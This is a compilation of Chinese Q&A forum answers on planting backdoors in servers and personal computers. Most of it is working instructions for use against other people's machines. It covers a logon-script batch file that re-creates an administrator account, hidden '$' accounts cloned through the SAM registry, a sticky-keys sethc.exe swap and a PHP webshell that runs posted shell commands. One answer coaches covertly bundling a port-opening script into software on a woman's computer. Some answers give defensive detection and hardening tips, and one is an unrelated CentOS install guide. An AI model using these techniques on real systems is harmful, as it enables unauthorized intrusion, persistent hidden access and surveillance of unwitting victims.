如何在伺服器留後門
⑴ 詳細講解如何留後門
1.進入站點,查看目錄許可權,可不可以寫入和跨目錄 2.查看admin,data,inc,upload等目錄內部信息,或者站少人訪問的直接站點根目錄留. 3.免殺小馬一般會在upload上傳目錄或者圖片目錄上傳,有時候直接就在主頁index裡麵包含跳轉上傳隱藏代碼,大馬一般不在根目錄,站長得到的地方出現,會利用另名來迷惑站長,比如css.asp,或者inc2.asp,ad1.asp這些放在特定文件夾里,而遇上懶的站長,就會把這個shell幫忙永久保存了,呵呵..用wenshell掃描器一般可以將大部分的webshell掃出來,除非經過特殊免殺代碼轉換,或者利用iis6.0的解析漏洞,比如123.asp;123.jpg,win2000系統會默認為圖片格式,但是默認的win2003iis6不會,直接解析成腳本執行,會導致webshell的出現,在動態單頁面里包含一句話提交又或者利用include包含大法執行,也是查不到後門的方法,大夥可以去挖挖.好了,簡單講到這我們從光明的站長說吧,站點沒出現什麼訪問問題,不代表沒問題,oday,代碼漏洞,注入,xss,nc上傳等分分鍾都可以使站點遭人種webshell 1.前面提到基本的方法就是shell掃描器,還有就是利用文件對比和舊的備份資料做對比,如果沒有備份也沒關系,直接把最新的文件列出來,用dreamwear查看代碼,一般大牛用它來挖洞的噢..呵呵. 2.頁面注入安全要防注,用戶帳號許可權要限制,目錄腳本執行也要限制,一般上傳圖片的就禁止執行,其他目錄禁止寫入,刪掉ws組建和cmd,除非是自己維護站點的,否則管理後台全部改名,且進行網段ip限制,自己的固定ip才可以登錄後台. 3.網站如果用過編輯器,比如ewebeditor,fck這些的,把無相關的刪掉,編輯器登錄後台地址刪掉,編輯器後台管理員帳戶密碼復雜化,去除帶有可上傳asa,asp,asasp,phpaspx,這些後綴,資料庫設置為只讀. 4.對可疑html清除包含漏洞,上面說過,可以包含上傳代碼運行呢.就像這樣:index?id=nhs8.com,就可以進入上傳畫面. 5.還是那句話,經常備份,升級網頁程序,掃描,查看記錄.
⑵ 我有機會經常玩別人電腦,怎麼在他的電腦當中留下後門
一.建立一個別人永遠刪不掉的管理員用戶操作步驟:
1、在自己電腦裡面建立一個.txt文本文件.
2、在裡面輸入內容
@echo off
net user yixiao 123456 /add 注釋:前面yixiao是用戶名後面123456是密碼;
net localgroup administrators yixiao /add
3、把這個文件保存,更改後綴為yixiao.bat 注釋:前面名字隨便,後面格式一定要是bat;
4、把這個文件拷貝到對方電腦C:\WINNT\system32\GroupPolicy\User\scripts\Logon文件目錄下,沒有的話自己創建。
完成,下次對方電腦無論如何都有這個管理員帳號,刪除了,下次啟動還有!
如果把裡面的內容改成
@echo off
net user administrator 123456 /add
意思是不管你怎麼改,下次啟動管理員帳號administrator密碼一直是123456。
二.俺認為上述的方法並不理想,可以用隱藏帳號方法來建帳號會更好 。
操作步驟:
1、首先建立一個帳號結尾要帶$號 ,如果yixiao$ , 密碼自己隨便,然後把帳號刪除.
2、將以下代碼保存成(.reg)注冊表形式
代碼如下:
——————————————————————————-
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHONE\SAM\SAM\Domains\Account\users\
names\yixiao$]
@=hex(1f4):
——————————————————————————-
說明:1f4是Administrator帳號十六進制的值
3、保存好後導入 ,然後用CMD命令設置密碼
net user yixiao$ 123456
這樣一個隱形帳號就建立好了,用戶在「本地用戶和組」內根本無法看到這個帳號。所以也不存在刪除帳號。記得千萬別在同事的電腦上搗鼓哦,如果被查出來。。。。。嘿嘿:-)
隱藏管理員帳號三分鍾搞定
對 regedit.exe我想大家都很熟悉,但卻不能對注冊表的項鍵設置許可權,而regedt32.exe最大的優點就是能夠對注冊表的項鍵設置許可權。 nt/2000/xp的帳戶信息都在注冊表的HKEY_LOCAL_MACHINE\\SAM\\SAM鍵下,但是除了系統用戶SYSTEM外,其它用戶 都無權查看到裡面的信息,因此我首先用regedt32.exe對SAM鍵為我設置為「完全控制」許可權。這樣就可以對SAM鍵內的信息進行讀寫了了。具體 步聚如下:
1、假設我們是以超級用戶administrator登錄到開有終端服務的肉雞上的,首先在命令行下或帳戶管理器中建立一個帳戶:hacker$,這里我在命令行下建立這個帳戶 net user hacker$ 1234 /add
2、在開始/運行中輸入:regedt32.exe並回車來運行regedt32.exe。
3、點「許可權」以後會彈出窗口點添加將我登錄時的帳戶添加到安全欄內,這里我是以administrator的身份登錄的,所以我就將 administrator加入,並設置許可權為「完全控制」。這里需要說明一下:最好是添加你登錄的帳戶或帳戶所在的組,切莫修改原有的帳戶或組,否則將 會帶來一系列不必要的問題。等隱藏超級用戶建好以,再來這里將你添加的帳戶刪除即可。
4、再點「開始」→「運行」並輸 入」regedit.exe」 回車,啟動注冊表編輯器regedit.exe。 打開鍵:HKEY_LOCAL_MAICHINE\\SAM\\SAM\\Domains\\account\\user\\names [url=file://hacker$/]\\hacker$[/url]」
5、將項hacker$、00000409、000001F4導出為hacker.reg、409.reg、 1f4.reg,用記事本分別打這幾個導出的文件進行編輯,將超級用戶對應的項000001F4下的鍵」F」的值復制,並覆蓋hacker$對應的項 00000409下的鍵」F」的值,然後再將00000409.reg與hacker.reg合並。
6、在命令行下執行net user hacker$ /del將用戶hacker$刪除:net user hacker$ /del
7、在regedit.exe的窗口內按F5刷新,然後打文件-導入注冊表文件將修改好的hacker.reg導入注冊表即可
8、到此,隱藏的超級用戶hacker$已經建好了,然後關閉regedit.exe。在regedt32.exe窗口內把HKEY_LOCAL_MACHINE\\SAM\\SAM鍵許可權改回原來的樣子(只要刪除添加的帳戶administrator即可)。
9、注意:隱藏的超級用戶建好後,在帳戶管理器看不到hacker$這個用戶,在命令行用「net user」命令也看不到,但是超級用戶建立以後,就不能再改密碼了,如果用net user命令來改hacker$的密碼的話,那麼在帳戶管理器中將又會看這個隱藏的超級用戶了,而且不能刪除。
那我們管理員又該如何把「隱藏賬戶」請出系統
隱藏賬戶的危害可謂十分巨大。因此我們有必要在了解了賬戶隱藏技術後,再對相應的防範技術作一個了解,把隱藏賬戶徹底請出系統。
1、添加「$」符號型隱藏賬戶
對於這類隱藏賬戶的檢測比較簡單。一般黑客在利用這種方法建立完隱藏賬戶後,會把隱藏賬戶提升為管理員許可權。那麼我們只需要在「命令提示符」中輸入 「net localgroup administrators」就可以讓所有的隱藏賬戶現形。如果嫌麻煩,可以直接打開「計算機管理」進行查看,添加「$」符號的賬戶是無法在這里隱藏 的。
2、修改注冊表型隱藏賬戶
由於使用這種方法隱藏的賬戶是不會在「命令提示符」和「計算機管理」中看到的,因此可以到 注冊表中刪除隱藏賬戶。來到「HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names」,把這 里存在的賬戶和「計算機管理」中存在的賬戶進行比較,多出來的賬戶就是隱藏賬戶了。想要刪除它也很簡單,直接刪除以隱藏賬戶命名的項即可。
3、無法看到名稱的隱藏賬戶
如果黑客製作了一個修改注冊表型隱藏賬戶,在此基礎上刪除了管理員對注冊表的操作許可權。那麼管理員是無法通過注冊表刪除隱藏賬戶的,甚至無法知道黑客建 立的隱藏賬戶名稱。不過世事沒有絕對,我們可以藉助「組策略」的幫助,讓黑客無法通過隱藏賬戶登陸。點擊「開始」→「運行」,輸入 「gpedit.msc」運行「組策略」,依次展開「計算機配置」→「Windows 設置」→「安全設置」→「本地策略」→「審核策略」,雙擊右邊的「審核策略更改」,在彈出的設置窗口中勾選「成功」,然後點「確定」。對「審核登陸事件」 和「審核過程追蹤」進行相同的設置。
進行登陸審核後,可以對任何賬戶的登陸操作進行記錄,包括隱藏賬戶,這樣我們就可以通過「計算機管理」中 的「事件查看器」准確得知隱藏賬戶的名稱,甚至黑客登陸的時間。即使黑客將所有的登陸日誌刪除,系統還會記錄是哪個賬戶刪除了系統日誌,這樣黑客的隱藏賬 戶就暴露無疑了。
得知隱藏賬戶的名稱後就好辦了,但是我們仍然不能刪除這個隱藏賬戶,因為我們沒有許可權。但是我們可以在「命令提示符」中輸入「net user 隱藏賬戶名稱 654321」更改這個隱藏賬戶的密碼。這樣這個隱藏賬戶就會失效,黑客無法再用這個隱藏賬戶登陸。
win2003下創建永遠的隱藏帳戶操作一、二
前段時間比較流行的一句話」肉機」其實要想控制遠端的計算機,那我想就少不了隱藏用戶帳號的問題了,其實創建隱藏用戶帳號還是比較簡單的,現在我就把創建隱藏用戶帳號告訴大家。
其實每一個用戶帳號在注冊表中都有自己帳號數據項
首先我們看看管理員在注冊表中的數據項是什麼樣的
操作一、打開注冊表:HKEY_LOCAL_MACHINE\SAM\SAM
SAM是保存用戶帳號的地方,不過這個「項」在默認情況下是不可見的。我們如果想看內部的內容就必須首先對其授權。(建議對注冊表不是很熟悉的朋友不要隨便改動注冊表)
操作二、認識注冊表中的帳號分類
在OS中的用戶帳號無論是內置帳號,還是後建帳號,在注冊表中都能看見。不過有兩個帳號大家一定要能夠認識,那就是管理員帳號和guest帳號。
」000001fa4」表示的是管理員帳號,即使管理員帳號被重命名了這個值也是不會變的,所以我們可以通過這個值來判斷,重命名後的管理員帳號。
「000001fa5」 表示的是guest帳號,同樣這個值也不會因為,來賓帳號給重命名而改變。剩下的其 它值基本上就是後來創建的用戶帳號,生成值了。 認識了注冊表後,現在我們就來利用」net user」命令創建帳號了,創建隱藏帳號必須在CMD下。有關常見的命令,這些命令也可以在OS的幫助中找到。
操作三、利用」net user」命令創建帳號
一、先建立隱藏用戶 xbx$ 1、net user xbx$ 123,abc /add 這里的意思是說,建立個xbx$ 帳戶密碼是123,abc
1、C:\Documents and Settings\Administrator>net localgroup administrators xbx$ /add 這里的意思是說把xbx,以便讓我們創建用戶具備管理員許可權。
一、觀察注冊表中的變化,並對注冊表做相應的修改。 HKEY_LOCAL_MACHINE\SAM\SAM
1、找到我們剛剛創建的用戶帳號
我們可以看見」000003f6」就是我們剛新建立的」xbx
2、在注冊表中多帳號許可權復制
找到HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users 這個項,打開」000001f4」項,然後再打開」F」。
然後將這裡面的值,全選,粘帖並覆蓋到」000003f6」的」F」值.
3、導出注冊表值
現在將注冊表中的「000001f4」、「000003f6」和「xbx」都導入出來,可直接將Users所有鍵值都導出來,到文件.
4、刪除帳號
接下來我們再次進入「CMD」中刪除「xbx
刪除帳號後,則注冊表中的值也就沒有了,這個時候我們再把剛才導出的注冊表項,導入到注冊表中。 這個時候我們打開「本地計算機用戶和組」就看不見「xbx」
先把system32下的sethc.exe刪除掉,然後 把cmd.exe改名為sethc.exe就OK了,利用的是5次連續敲擊shift的熱鍵功能,下次你3389登陸伺服器的時候,就可以利用熱鍵功能打開cmd,從而增加賬號,就可以登錄伺服器了
⑶ php網站怎麼留後門
在php.ini中設置開啟exec() system()等函數
創建 terminal.php 文件如下
<?php
!(isset($_POST['parma'])&&$_POST['parma']!='')&&exit("請輸入需要執行的shell命令");
!(isset($_POST['type'])&&$_POST['type']!='')&&exit("請輸入調用函數的類型");
$parma=$_POST['parma'];
switch($_POST['type']){
case'system':
returnsystem($parma);
break;
case'exec':
returnexec($parma,$return);
break;
case'passthru':
returnpassthru($parma);
break;
default:
exit;
}
?>
⑷ php如何留後門
試試php加密,還有,上面的只是正版驗證,談不上後門。
加個在線驗證,比如域名與伺服器上資料庫中對比,不在的,下面就不處理,直接結束。
如果在列表中的,正常處理數據。
⑸ 如何給個人主機留後門
你現在也沒給分呀?
抓雞早就不玩了?
看來你是個老手啊?
怎麼連個後門都不會?
順便說下,沒分不幫...
============
暈!不還是一個意思嗎?
什麼叫抓雞?如果你會抓雞,應該知道如何來抓.
如果對方事先中了你的馬,那也不叫什麼抓雞了。
無非就是先進入對方的機器,然後再中上馬,這就
算抓到了一隻,前提是先進入機器內,然後下馬。
既然你會抓,為何不知道如何進入機器?
下馬那是進去後再辦的事,你如果會抓雞也就代表
著你能進入她的機器,如果你連如何進入她的機器
都不會?那還怎麼抓雞?
真是暈呢!
不過既然再一次關注了這個問題,我就不仿教教你
另一方面也刺激刺激你的囂張氣焰,不會就是不會
別整沒用的,請教問題就誠心點.
其實留後門和下馬都是一個道理,就是想叫自己
今後可以輕而易舉的進進出出,不過對於後門.
很多情況下都想到了「木馬」。也可以這么說。
不過道上稍微有些頭腦的人都知道,最隱秘、最
有效的後門不是在對方的機器上放什麼「馬」。
而是在對方的系統設置里動些手腳,在不安裝額外
程序的同時,給自己留一個方便。
比如:
1:
開啟「RPC相關服務」大約也就1-3個
然後利用"rECTON"就可以在對方不知道的情況下,
開啟一個CMD後門,利用這個你可以給她開telnet.
等等... 總之,你獲得了cmd還會愁嗎?
這個前提是你要知道對方機器的密碼...
2:
"bat、批處理"貼吧里有很多閑人,你叫他們給你
寫個簡單的批處理文件,加到啟動項里。
這個.bat不是病毒,而是啟動的自動開啟一個埠
135、139...如果你會抓雞應該知道,像這種可以
利用入侵的埠實在是不少.這個批處理就像個
糖衣炮彈,根本不會被殺軟查殺。即使防火牆、
殺軟更新了補丁、自動關閉了哪些埠。
只要再一開機,它還會自動運行這個.bat。然後
開一個口口方便你隨時進入。
3:
你能想到在她電腦里留個門,也就意味著你有可能
會接觸到她的電腦,只是想在自己方便時,隨時進
去看看。那樣就更好辦了.她電腦不是聯想自己帶
的備份嗎?如果在系統里動不了手腳,你還可以從
應用程序里下手,比如:她剛剛恢復了一下系統..
但是其他的應用軟體她沒有裝,比如QQ、MSN、UC
winrar、QQ飛車、暴風影音、攝像頭驅動...等等.
太多需要重新安裝的了。
這樣一來,你先准備好一個可以開「3389、telnet
rECTON應用服務、135、139等等」的批處理.
大小不過10k,也不會被查殺。然後將這個批處理
捆綁到以上應用程序里,系統恢復後,她畢竟得安
程序吧,只要她安裝了以上任意一款程序,都會
自動把這個批處理填加到新系統里,不管她用什麼
防火牆、殺軟。當他安裝的那一刻,後門已經悄悄
的打開了,並且還不是木馬。
她是一個女生,本身安全防範意識就不怎麼強。
她以為新恢復的系統很乾凈,根本不會去理會什麼
3389、telnet、RPC服務、135、139...
這樣你不就知道她機器開了什麼嗎?
她聯想給她自帶的系統你該不了,那你不會從她電
腦里的應用程序下手嗎?死腦筋...
其實我說的都是一種概念,具體的你要問我怎麼寫
批處理、怎麼開系統服務、怎麼捆綁安全的代碼.
我是不會跟你再羅嗦下去的,想辦成的事,自己去
琢磨。主要還是方法...
總結:
在對方是新系統的情況下,想辦法在應用程序
上著手,別老是認為她系統沒開3389.就泄氣.
再著,如果對方有殺軟、防火牆。盡量不要
使用木馬,盡量在安全設置上稍微開個方便就
夠了,比如只需要打開一項系統服務rpc,就
夠你去連的了.或著在其他軟體上給她加個
批處理,安全又實在的打開必要的埠。這個
埠能夠為你的入侵提供方便就足夠了.
至於防火牆,就要看你的本事了.
如果你是個抓雞老手,應該知道在本地發一個
什麼樣的數據會被對方攔截。
同樣,你也會知道,利用什麼東西打馬虎眼來
個矇混過關,給你個提醒 - 如QQ...
你在和她聊Q的時候就可以實現.
哎!!! 自己琢磨去吧。
別以為別人會給你現成的東西。
畢竟你這一分都沒有!
⑹ 如何在Windows,Linux中安裝後門
在Windows7系統下安裝Linux方法,下面以Centos版本的Linux系統安裝為例,下面是步驟:1、首先,插入一張CentOS 6.4的安裝介質(光碟或者刻錄的U盤),使用介質啟動電腦出現如下界面。
Install or upgrade an existing system 安裝或升級現有的系統
install system with basic video driver 安裝過程中採用基本的顯卡驅動
Rescue installed system 進入系統修復模式
Boot from local drive 退出安裝從硬碟啟動
Memory test 內存檢測
2、這一步檢查系統鏡像是否有錯誤,時間較長,不想等待;直接「skip」就可以了。
3、出現引導界面,點擊「next」。
4、選中「English(English)」否則會有部分亂碼問題。
5、鍵盤布局選擇「U.S.English」。
6、選擇「Basic Storage Devies"點擊"Next"。
7、詢問是否忽略所有數據,新電腦安裝系統選擇"Yes,discard any data"。
8、Hostname填寫格式「英文名.姓」。
9、網路設置安裝圖示順序點擊就可以了。
10、時區可以在地圖上點擊,選擇「shanghai」並取消System clock uses UTC前面的對勾。
11、設置root的密碼。
12、硬碟分區,一定要按照圖示點選。
13、調整分區,必須要有/home這個分區,如果沒有這個分區,安裝部分軟體會出現不能安裝的問題。
14、詢問是否格式化分區,選擇Format格式化即可。
15、將更改寫入到硬碟。
16、引導程序安裝位置。
17、最重要的一步,也是最關鍵的一步,按圖示順序點擊即可。
18、至此,一個最精簡Centos系統的桌面環境就設置完成了,然後系統開始自動安裝。
19、安裝完成後,重啟系統進入登陸界面,輸入用戶名密碼登陸即可。
⑺ 怎麼給電腦(伺服器)留後門
好多後門呀、、真的很多、、一時間都想不起來。。
最簡單的開個3389或4899
我記得有一個TMD遠控。
反正我這上面顯示的是TMD
是不是我不知道、、
這個遠控的特點是..
服務端1K、、
留作後門的好幫手啊!
⑻ 什麼是伺服器後門
就是在伺服器上留下非合法正常登陸的模式,一般情況下,合法的用戶會通過用戶名,密碼登陸伺服器,而留下後門的伺服器,黑客不用通過正常的用戶名,密碼驗證就能直接登陸伺服器。。這就是後門。。
形象的比喻伺服器後門就是房子的窗戶,主人從大門進入,黑客從窗戶側面進入。。
⑼ iis是什麼 怎麼在iis伺服器留下永遠的後門
IIS是服務組件,如果你想做一個網站伺服器,你安裝了 服務操作系統 要想把網站發布出去 必須要這個組件!
⑽ 如何給系統留後門
法律解決問題,像你這樣來解決問題。最後追究法律責任的時候就會麻煩了。破壞是解決不了問題的。 你現在把伺服器留後門也沒用,以後維護就會自動補上的,灰鴿子也起不了多大作用。要是想破壞伺服器,拿自己的機器做實驗(建議你去國外的網站下載外國的病毒,不是木馬啊,木馬沒用。小偷們才用木馬呢。國外的病毒比較強悍,國產的殺毒軟體基本上(狒狒)破壞還原。(國外的病毒很 叼 卡巴沒轍)
以上只是建議 最好別使用 追究法律責任你就(狒狒)了